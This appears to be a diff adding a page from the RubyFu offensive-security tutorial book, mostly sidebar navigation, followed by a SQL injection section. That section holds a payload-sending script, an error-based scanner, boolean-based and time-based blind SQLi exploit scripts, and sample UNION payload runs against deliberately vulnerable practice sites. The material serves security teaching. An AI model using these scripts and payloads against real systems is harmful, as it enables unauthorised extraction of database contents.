868
+ </a>
869
+
870
+
871
+ <ul class="articles">
872
+
873
+
874
+ <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
875
+
876
+
877
+ <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
878
+
879
+ <i class="fa fa-check"></i>
880
+
881
+ <b>5.1.</b>
882
+
883
+ Fuzzer
884
+ </a>
885
+
886
+
887
+ </li>
888
+
889
+ <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
890
+
891
+
892
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
893
+
894
+ <i class="fa fa-check"></i>
895
+
896
+ <b>5.2.</b>
897
+
898
+ Metasploit
899
+ </a>
900
+
901
+
902
+ <ul class="articles">
903
+
904
+
905
+ <li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
906
+
907
+
908
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
909
+
910
+ <i class="fa fa-check"></i>
911
+
912
+ <b>5.2.1.</b>
913
+
914
+ Auxiliary module
915
+ </a>
916
+
917
+
918
+ </li>
919
+
920
+ <li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
921
+
922
+
923
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
924
+
925
+ <i class="fa fa-check"></i>
926
+
927
+ <b>5.2.2.</b>
928
+
929
+ Exploit module
930
+ </a>
931
+
932
+
933
+ </li>
934
+
935
+ <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
936
+
937
+
938
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
939
+
940
+ <i class="fa fa-check"></i>
941
+
942
+ <b>5.2.3.</b>
943
+
944
+ Meterpreter
945
+ </a>
946
+
947
+
948
+ <ul class="articles">
949
+
950
+
951
+ <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
952
+
953
+
954
+ <a href="../module_0x5__exploitation_kung_fu/extensions.html">
955
+
956
+ <i class="fa fa-check"></i>
957
+
958
+ <b>5.2.3.1.</b>
959
+
960
+ API and Extensions
961
+ </a>
962
+
963
+
964
+ </li>
965
+
966
+ <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
967
+
968
+
969
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
970
+
971
+ <i class="fa fa-check"></i>
972
+
973
+ <b>5.2.3.2.</b>
974
+
975
+ Meterpreter Scripting
976
+ </a>
977
+
978
+
979
+ </li>
980
+
981
+ <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
982
+
983
+
984
+ <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
985
+
986
+ <i class="fa fa-check"></i>
987
+
988
+ <b>5.2.3.3.</b>
989
+
990
+ Railgun API Extension
991
+ </a>
992
+
993
+
994
+ </li>
995
+
996
+
997
+ </ul>
998
+
999
+ </li>
1000
+
1001
+
1002
+ </ul>
1003
+
1004
+ </li>
1005
+
1006
+ <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
1007
+
1008
+
1009
+ <a href="../module_0x5__exploitation_kung_fu/metasm.html">
1010
+
1011
+ <i class="fa fa-check"></i>
1012
+
1013
+ <b>5.3.</b>
1014
+
1015
+ metasm
1016
+ </a>
1017
+
1018
+
1019
+ </li>
1020
+
1021
+
1022
+ </ul>
1023
+
1024
+ </li>
1025
+
1026
+ <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
1027
+
1028
+
1029
+ <a href="../module_0x6__forensic/index.html">
1030
+
1031
+ <i class="fa fa-check"></i>
1032
+
1033
+ <b>6.</b>
1034
+
1035
+ Module 0x6 | Forensic Kung Fu
1036
+ </a>
1037
+
1038
+
1039
+ <ul class="articles">
1040
+
1041
+
1042
+ <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
1043
+
1044
+
1045
+ <a href="../module_0x6__forensic/windows_forensic.html">
1046
+
1047
+ <i class="fa fa-check"></i>
1048
+
1049
+ <b>6.1.</b>
1050
+
1051
+ Windows Forensic
1052
+ </a>
1053
+
1054
+
1055
+ </li>
1056
+
1057
+ <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
1058
+
1059
+
1060
+ <a href="../module_0x6__forensic/android_forensic.html">
1061
+
1062
+ <i class="fa fa-check"></i>
1063
+
1064
+ <b>6.2.</b>
1065
+
1066
+ Android Forensic
1067
+ </a>
1068
+
1069
+
1070
+ </li>
1071
+
1072
+ <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
1073
+
1074
+
1075
+ <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
1076
+
1077
+ <i class="fa fa-check"></i>
1078
+
1079
+ <b>6.3.</b>
1080
+
1081
+ Network Traffic Analysis
1082
+ </a>
1083
+
1084
+
1085
+ </li>
1086
+
1087
+ <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
1088
+
1089
+
1090
+ <a href="../module_0x6__forensic/parsing_log_files.html">
1091
+
1092
+ <i class="fa fa-check"></i>
1093
+
1094
+ <b>6.4.</b>
1095
+
1096
+ Parsing Log Files
1097
+ </a>
1098
+
1099
+
1100
+ </li>
1101
+
1102
+
1103
+ </ul>
1104
+
1105
+ </li>
1106
+
1107
+ <li class="chapter " data-level="7" data-path="references/index.html">
1108
+
1109
+
1110
+ <a href="../references/index.html">
1111
+
1112
+ <i class="fa fa-check"></i>
1113
+
1114
+ <b>7.</b>
1115
+
1116
+ References
1117
+ </a>
1118
+
1119
+
1120
+ </li>
1121
+
1122
+ <li class="chapter " data-level="8" data-path="faqs/index.html">
1123
+
1124
+
1125
+ <a href="../faqs/index.html">
1126
+
1127
+ <i class="fa fa-check"></i>
1128
+
1129
+ <b>8.</b>
1130
+
1131
+ FAQs
1132
+ </a>
1133
+
1134
+
1135
+ </li>
1136
+
1137
+ <li class="chapter " data-level="9" data-path="contributors/index.html">
1138
+
1139
+
1140
+ <a href="../contributors/index.html">
1141
+
1142
+ <i class="fa fa-check"></i>
1143
+
1144
+ <b>9.</b>
1145
+
1146
+ Contributors
1147
+ </a>
1148
+
1149
+
1150
+ <ul class="articles">
1151
+
1152
+
1153
+ <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
1154
+
1155
+
1156
+ <a href="../contributors/todo.html">
1157
+
1158
+ <i class="fa fa-check"></i>
1159
+
1160
+ <b>9.1.</b>
1161
+
1162
+ TODO
1163
+ </a>
1164
+
1165
+
1166
+ </li>
1167
+
1168
+
1169
+ </ul>
1170
+
1171
+ </li>
1172
+
1173
+
1174
+
1175
+
1176
+ <li class="divider"></li>
1177
+ <li>
1178
+ <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
1179
+ Published with GitBook
1180
+ </a>
1181
+ </li>
1182
+
1183
+ </ul>
1184
+ </nav>
1185
+ </div>
1186
+
1187
+ <div class="book-body">
1188
+ <div class="body-inner">
1189
+ <div class="book-header" role="navigation">
1190
+ <!-- Actions Left -->
1191
+
1192
+
1193
+ <!-- Title -->
1194
+ <h1>
1195
+ <i class="fa fa-circle-o-notch fa-spin"></i>
1196
+ <a href="../" >RubyFu</a>
1197
+ </h1>
1198
+ </div>
1199
+
1200
+ <div class="page-wrapper" tabindex="-1" role="main">
1201
+ <div class="page-inner">
1202
+
1203
+
1204
+ <section class="normal" id="section-">
1205
+
1206
+ <h1 id="sql-injection-scanner"><a name="sql-injection-scanner" class="plugin-anchor" href="#sql-injection-scanner"><span class="fa fa-link"></span></a>SQL Injection Scanner</h1>
1207
+ <h2 id="basic-sqli-script-as-command-line-browser"><a name="basic-sqli-script-as-command-line-browser" class="plugin-anchor" href="#basic-sqli-script-as-command-line-browser"><span class="fa fa-link"></span></a>Basic SQLi script as command line browser</h2>
1208
+ <p>The is a very basic script take your given payload and send it to the vulnerable parameter and returns the response back to you. I&apos;ll use (<a href="http://testphp.vulnweb.com/" target="_blank">http://testphp.vulnweb.com/</a>) as it&apos;s legal to test.</p>
1209
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1210
+ <span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
1211
+ <span class="hljs-comment"># Send your payload from command line</span>
1212
+ <span class="hljs-comment">#</span>
1213
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&quot;net/http&quot;</span>
1214
+
1215
+ <span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">2</span>
1216
+ puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> [IP ADDRESS] [PAYLOAD]&quot;</span>
1217
+ exit <span class="hljs-number">0</span>
1218
+ <span class="hljs-keyword">else</span>
1219
+ host, payload = <span class="hljs-constant">ARGV</span>
1220
+ <span class="hljs-keyword">end</span>
1221
+
1222
+ uri = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/artists.php?&quot;</span>)
1223
+ uri.query = <span class="hljs-constant">URI</span>.encode_www_form({<span class="hljs-string">&quot;artist&quot;</span> =&gt; <span class="hljs-string">&quot;<span class="hljs-subst">#{payload}</span>&quot;</span>})
1224
+ http = <span class="hljs-constant">Net::HTTP</span>.new(uri.host, uri.port)
1225
+ http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri.scheme == <span class="hljs-string">&apos;https&apos;</span> <span class="hljs-comment"># Enable HTTPS support if it&apos;s HTTPS</span>
1226
+ <span class="hljs-comment"># http.set_debug_output($stdout)</span>
1227
+
1228
+ request = <span class="hljs-constant">Net::HTTP::Get</span>.new(uri.request_uri)
1229
+ response = http.request(request)
1230
+ <span class="hljs-comment"># puts &quot;[+] Status code: &quot;+ response.code + &quot;\n\n&quot;</span>
1231
+ <span class="hljs-comment"># puts response.body.gsub(/&lt;.*?&gt;/, &apos;&apos;).strip</span>
1232
+ puts response.body.scan(<span class="hljs-regexp">/&lt;h2 id=&apos;pageName&apos;&gt;.*&lt;\/h2&gt;/</span>).join.gsub(<span class="hljs-regexp">/&lt;.*?&gt;/</span>, <span class="hljs-string">&apos;&apos;</span>).strip
1233
+
1234
+ puts <span class="hljs-string">&quot;&quot;</span>
1235
+ </code></pre>
1236
+ <blockquote>
1237
+ <p>I&apos;ve commented the line <code>puts response.body.gsub(/&lt;.*?&gt;/, &apos;&apos;).strip</code> and added a custom regular expression to fix our target outputs.</p>
1238
+ </blockquote>
1239
+ <p>Let&apos;s to test it in action</p>
1240
+ <pre><code>ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,NULL,NULL,NULL#&quot; | grep -i -e warning -e error
1241
+ # =&gt; Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62
1242
+
1243
+ ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,NULL,NULL#&quot; | grep -i -e warning -e error
1244
+ # =&gt;
1245
+
1246
+ ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,@@VERSION,NULL#&quot;
1247
+ # =&gt; artist: 5.1.73-0ubuntu0.10.04.1
1248
+
1249
+ ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,GROUP_CONCAT(table_name),NULL FROM information_schema.tables#&quot;
1250
+ # =&gt; artist: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
1251
+ </code></pre><p>Here a very basic and simple SQL-injection solid scanner, develop it as far as you can!</p>
1252
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1253
+ <span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
1254
+ <span class="hljs-comment"># Very basic SQLi scanner!</span>
1255
+ <span class="hljs-comment">#</span>
1256
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;net/http&apos;</span>
1257
+
1258
+ <span class="hljs-comment"># Some SQLi payloads</span>
1259
+ payloads =
1260
+ [
1261
+ <span class="hljs-string">&quot;&apos;&quot;</span>,
1262
+ <span class="hljs-string">&apos;&quot;&apos;</span>,
1263
+ <span class="hljs-string">&quot;&apos; or 1=2--+&quot;</span>
1264
+ ]
1265
+
1266
+ <span class="hljs-comment"># Some database error responses</span>
1267
+ errors =
1268
+ {
1269
+ <span class="hljs-symbol">:mysql</span> =&gt; [
1270
+ <span class="hljs-string">&quot;SQL.*syntax&quot;</span>,
1271
+ <span class="hljs-string">&quot;mysql.*(fetch).*array&quot;</span>,
1272
+ <span class="hljs-string">&quot;Warning&quot;</span>
1273
+ ],
1274
+ <span class="hljs-symbol">:mssql</span> =&gt; [
1275
+ <span class="hljs-string">&quot;line.*[0-9]&quot;</span>,
1276
+ <span class="hljs-string">&quot;Microsoft SQL Native Client error.*&quot;</span>
1277
+ ],
1278
+ <span class="hljs-symbol">:oracle</span> =&gt; [
1279
+ <span class="hljs-string">&quot;.*ORA-[0-9].*&quot;</span>,
1280
+ <span class="hljs-string">&quot;Warning&quot;</span>
1281
+ ]
1282
+ }
1283
+
1284
+ <span class="hljs-comment"># Try a known vulnerable site</span>
1285
+ uri = <span class="hljs-constant">URI</span>.parse <span class="hljs-string">&quot;http://testphp.vulnweb.com/artists.php?artist=1&quot;</span>
1286
+
1287
+ <span class="hljs-comment"># Update the query with a payload</span>
1288
+ uri.query += payloads[<span class="hljs-number">0</span>]
1289
+
1290
+ <span class="hljs-comment"># Send get request</span>
1291
+ response = <span class="hljs-constant">Net::HTTP</span>.get uri
1292
+
1293
+ <span class="hljs-comment"># Search if an error occurred = vulnerable</span>
1294
+ puts <span class="hljs-string">&quot;[+] The <span class="hljs-subst">#{<span class="hljs-constant">URL</span>.decode(uri.to_s)}</span> is vulnerable!&quot;</span> <span class="hljs-keyword">unless</span> response.match(<span class="hljs-regexp">/<span class="hljs-subst">#{errors[<span class="hljs-symbol">:mysql</span>][<span class="hljs-number">0</span>]}</span>/i</span>).<span class="hljs-keyword">nil</span>?
1295
+ </code></pre>
1296
+ <p>Try it on this URL (<a href="http://testasp.vulnweb.com/showforum.asp?id=0" target="_blank">http://testasp.vulnweb.com/showforum.asp?id=0</a>)</p>
1297
+ <p>Results</p>
1298
+ <pre><code>ruby sqli.rb http://testasp.vulnweb.com/showforum.asp?id=0
1299
+ [+] The http://testphp.vulnweb.com/artists.php?artist=1&apos; is vulnerable!
1300
+ </code></pre><h2 id="booleanbases-sqli-exploit-script"><a name="booleanbases-sqli-exploit-script" class="plugin-anchor" href="#booleanbases-sqli-exploit-script"><span class="fa fa-link"></span></a>Boolean-bases SQLi Exploit Script</h2>
1301
+ <p>Here is a Boolean-based SQLi exploit for <a href="https://github.com/Audi-1/sqli-labs" target="_blank">sqli-labs</a> vulnerable application.</p>
1302
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1303
+ <span class="hljs-comment"># Boolean-based SQLi exploit</span>
1304
+ <span class="hljs-comment"># Sabri Saleh | <span class="hljs-doctag">@KINGSABRI</span></span>
1305
+ <span class="hljs-comment">#</span>
1306
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;open-uri&apos;</span>
1307
+
1308
+ <span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">1</span>
1309
+ puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> &lt;IP ADDRESS&gt;&quot;</span>
1310
+ exit <span class="hljs-number">0</span>
1311
+ <span class="hljs-keyword">else</span>
1312
+ host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>]
1313
+ <span class="hljs-keyword">end</span>
1314
+
1315
+ <span class="hljs-comment"># Just colorizing outputs</span>
1316
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">String</span></span>
1317
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">red</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[31m&quot;</span>); <span class="hljs-keyword">end</span>
1318
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">green</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[32m&quot;</span>); <span class="hljs-keyword">end</span>
1319
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">bold</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m&quot;</span>); <span class="hljs-keyword">end</span>
1320
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">colorize</span><span class="hljs-params">(text, color_code)</span> &quot;<span class="hljs-comment">#{color_code}#{text}\e[0m&quot; end</span></span>
1321
+ <span class="hljs-keyword">end</span>
1322
+
1323
+ <span class="hljs-comment"># SQL injection</span>
1324
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_bbsqli</span><span class="hljs-params">(url, query)</span></span>
1325
+ <span class="hljs-keyword">begin</span>
1326
+
1327
+ response = open(<span class="hljs-constant">URI</span>.parse( <span class="hljs-constant">URI</span>.encode(<span class="hljs-string">&quot;<span class="hljs-subst">#{url}</span><span class="hljs-subst">#{query}</span>&quot;</span>) ))
1328
+
1329
+ <span class="hljs-keyword">if</span> !response.read.scan(<span class="hljs-string">&quot;You are in...........&quot;</span>).empty?
1330
+ <span class="hljs-keyword">return</span> <span class="hljs-number">1</span> <span class="hljs-comment"># TRUE</span>
1331
+ <span class="hljs-keyword">end</span>
1332
+
1333
+ <span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> =&gt; e
1334
+ puts <span class="hljs-string">&quot;[!] Failed to SQL inject <span class="hljs-subst">#{e}</span>&quot;</span>.red
1335
+ exit <span class="hljs-number">0</span>
1336
+ <span class="hljs-keyword">end</span>
1337
+ <span class="hljs-keyword">end</span>
1338
+
1339
+ url = <span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/sqli-labs/Less-8/index.php?id=&quot;</span>
1340
+
1341
+ puts <span class="hljs-string">&quot;[*] Start Sending Boolean-based SQLi&quot;</span>.bold
1342
+
1343
+ extracted = []
1344
+ (<span class="hljs-number">1</span>..<span class="hljs-number">100</span>).map <span class="hljs-keyword">do</span> |position|
1345
+ (<span class="hljs-number">32</span>..<span class="hljs-number">126</span>).map <span class="hljs-keyword">do</span> |char|
1346
+ puts <span class="hljs-string">&quot;[*] Brute-forcing on Position: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{position}</span>&quot;</span>.green + <span class="hljs-string">&quot; | &quot;</span>.bold + <span class="hljs-string">&quot;Character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char}</span> = <span class="hljs-subst">#{char.chr}</span>&quot;</span>.green
1347
+
1348
+ <span class="hljs-comment"># Put your query here </span>
1349
+ <span class="hljs-comment"># query = &quot;1&apos; AND (ASCII(SUBSTR((SELECT DATABASE()),#{position},1)))=#{char}--+&quot;</span>
1350
+ query = <span class="hljs-string">&quot;1&apos; AND (ASCII(SUBSTR((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),<span class="hljs-subst">#{position}</span>,1)))=<span class="hljs-subst">#{char}</span>--+&quot;</span>
1351
+ result = send_bbsqli(url, query)
1352
+ <span class="hljs-keyword">if</span> result.eql? <span class="hljs-number">1</span>
1353
+ puts <span class="hljs-string">&quot;[+] Found character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char.to_s(<span class="hljs-number">16</span>)}</span> hex&quot;</span>.green
1354
+
1355
+ extracted &lt;&lt; char.chr
1356
+ puts <span class="hljs-string">&quot;[+] Extracted characters: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
1357
+ <span class="hljs-keyword">break</span>
1358
+ <span class="hljs-keyword">end</span>
1359
+ <span class="hljs-keyword">end</span>
1360
+ <span class="hljs-keyword">end</span>
1361
+
1362
+ puts <span class="hljs-string">&quot;\n\n[+] Final found string: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
1363
+ </code></pre>
1364
+ <h2 id="timebases-sqli-exploit-script"><a name="timebases-sqli-exploit-script" class="plugin-anchor" href="#timebases-sqli-exploit-script"><span class="fa fa-link"></span></a>Time-bases SQLi Exploit Script</h2>
1365
+ <p>A Time-based SQLi exploit for <a href="https://github.com/Audi-1/sqli-labs" target="_blank">sqli-labs</a> vulnerable application.</p>
1366
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1367
+ <span class="hljs-comment"># Boolean-based SQLi exploit</span>
1368
+ <span class="hljs-comment"># Sabri Saleh | <span class="hljs-doctag">@KINGSABRI</span></span>
1369
+ <span class="hljs-comment">#</span>
1370
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;open-uri&apos;</span>
1371
+
1372
+ <span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">1</span>
1373
+ puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> &lt;IP ADDRESS&gt;&quot;</span>
1374
+ exit <span class="hljs-number">0</span>
1375
+ <span class="hljs-keyword">else</span>
1376
+ host = <span class="hljs-constant">ARGV</span>[<span class="hljs-number">0</span>]
1377
+ <span class="hljs-keyword">end</span>
1378
+
1379
+ <span class="hljs-comment"># Just colorizing outputs</span>
1380
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">String</span></span>
1381
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">red</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[31m&quot;</span>); <span class="hljs-keyword">end</span>
1382
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">green</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m\e[32m&quot;</span>); <span class="hljs-keyword">end</span>
1383
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">bold</span>;</span> colorize(<span class="hljs-keyword">self</span>, <span class="hljs-string">&quot;\e[1m&quot;</span>); <span class="hljs-keyword">end</span>
1384
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">colorize</span><span class="hljs-params">(text, color_code)</span> &quot;<span class="hljs-comment">#{color_code}#{text}\e[0m&quot; end</span></span>
1385
+ <span class="hljs-keyword">end</span>
1386
+
1387
+ <span class="hljs-comment"># SQL injection</span>
1388
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_tbsqli</span><span class="hljs-params">(url, query, time2wait)</span></span>
1389
+ <span class="hljs-keyword">begin</span>
1390
+ start_time = <span class="hljs-constant">Time</span>.now
1391
+ response = open(<span class="hljs-constant">URI</span>.parse( <span class="hljs-constant">URI</span>.encode(<span class="hljs-string">&quot;<span class="hljs-subst">#{url}</span><span class="hljs-subst">#{query}</span>&quot;</span>) ))
1392
+ end_time = <span class="hljs-constant">Time</span>.now
1393
+ howlong = end_time - start_time
1394
+
1395
+ <span class="hljs-keyword">if</span> howlong &gt;= time2wait
1396
+ <span class="hljs-keyword">return</span> <span class="hljs-number">1</span> <span class="hljs-comment"># TRUE</span>
1397
+ <span class="hljs-keyword">end</span>
1398
+
1399
+ <span class="hljs-keyword">rescue</span> <span class="hljs-constant">Exception</span> =&gt; e
1400
+ puts <span class="hljs-string">&quot;[!] Failed to SQL inject <span class="hljs-subst">#{e}</span>&quot;</span>.red
1401
+ exit <span class="hljs-number">0</span>
1402
+ <span class="hljs-keyword">end</span>
1403
+ <span class="hljs-keyword">end</span>
1404
+
1405
+ url = <span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/sqli-labs/Less-10/index.php?id=&quot;</span>
1406
+
1407
+ puts <span class="hljs-string">&quot;[*] Start Sending Boolean-based SQLi&quot;</span>.bold
1408
+ time2wait = <span class="hljs-number">5</span>
1409
+ extracted = []
1410
+ (<span class="hljs-number">1</span>..<span class="hljs-number">76</span>).map <span class="hljs-keyword">do</span> |position|
1411
+ (<span class="hljs-number">32</span>..<span class="hljs-number">126</span>).map <span class="hljs-keyword">do</span> |char|
1412
+ puts <span class="hljs-string">&quot;[*] Brute-forcing on Position: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{position}</span>&quot;</span>.green + <span class="hljs-string">&quot; | &quot;</span>.bold + <span class="hljs-string">&quot;Character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char}</span> = <span class="hljs-subst">#{char.chr}</span>&quot;</span>.green
1413
+
1414
+ <span class="hljs-comment"># Put your query here </span>
1415
+ query = <span class="hljs-string">&quot;1\&quot; AND IF((ASCII(SUBSTR((SELECT DATABASE()),<span class="hljs-subst">#{position}</span>,1)))=<span class="hljs-subst">#{char}</span>, SLEEP(<span class="hljs-subst">#{time2wait}</span>), NULL)--+&quot;</span>
1416
+
1417
+ result = send_tbsqli(url, query, time2wait)
1418
+ <span class="hljs-keyword">if</span> result.eql? <span class="hljs-number">1</span>
1419
+ puts <span class="hljs-string">&quot;[+] Found character: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{char.to_s(<span class="hljs-number">16</span>)}</span> hex&quot;</span>.green
1420
+
1421
+ extracted &lt;&lt; char.chr
1422
+ puts <span class="hljs-string">&quot;[+] Extracted characters: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
1423
+ <span class="hljs-keyword">break</span>
1424
+ <span class="hljs-keyword">end</span>
1425
+ <span class="hljs-keyword">end</span>
1426
+ <span class="hljs-keyword">end</span>
1427
+
1428
+ puts <span class="hljs-string">&quot;\n\n[+] Final found string: &quot;</span>.bold + <span class="hljs-string">&quot;<span class="hljs-subst">#{extracted.join}</span>&quot;</span>.green
1429
+ </code></pre>
1430
+
1431
+
1432
+ </section>
1433
+
1434
+
1435
+ </div>
1436
+ </div>
1437
+ </div>
1438
+
1439
+
1440
+ <a href="../module_0x4__web_kung_fu/index.html" class="navigation navigation-prev " aria-label="Previous page: Module 0x4 | Web Kung Fu"><i class="fa fa-angle-left"></i></a>
1441
+
1442
+
1443
+ <a href="../module_0x4__web_kung_fu/databases.html" class="navigation navigation-next " aria-label="Next page: Databases"><i class="fa fa-angle-right"></i></a>
1444
+
1445
+ </div>
1446
+ </div>
1447
+
1448
+
1449
+ <script src="../gitbook/app.js"></script>
1450
+
1451
+
1452
+ <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
1453
+
1454
+
1455
+
1456
+ <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
1457
+
1458
+
1459
+
1460
+ <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
1461
+
1462
+
1463
+
1464
+ <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
1465
+
1466
+
1467
+
1468
+ <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
1469
+
1470
+
1471
+
1472
+ <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
1473
+
1474
+
1475
+
1476
+ <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
1477
+
1478
+
1479
+ <script>
1480
+ require(["gitbook"], function(gitbook) {
1481
+ var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
1482
+ gitbook.start(config);
1483
+ });
1484
+ </script>
1485
+
1486
+
1487
+ </body>
1488
+
1489
+ </html>